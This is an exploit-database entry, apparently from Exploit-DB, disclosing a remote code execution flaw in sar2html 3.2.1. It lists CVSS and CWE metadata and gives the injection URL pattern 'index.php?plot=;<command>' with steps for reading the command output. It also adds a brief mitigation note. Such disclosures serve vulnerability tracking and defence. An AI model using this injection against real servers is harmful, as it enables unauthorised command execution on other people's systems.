header-logo
Suggest Exploit
vendor:
sar2html
by:
Furkan KAYAPINAR
7.5
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: sar2html
Affected Version From: 3.2.1
Affected Version To: 3.2.1
Patch Exists: NO
Related CWE: N/A
CPE: //a:sar2html:sar2html:3.2.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Centos 7
2019

sar2html Remote Code Execution

In web application you will see index.php?plot url extension. http://<ipaddr>/index.php?plot=;<command-here> will execute the command you entered. After command injection press 'select # host' then your command's output will appear bottom side of the scroll screen.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in any system command.
Source

Exploit-DB raw data:

# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.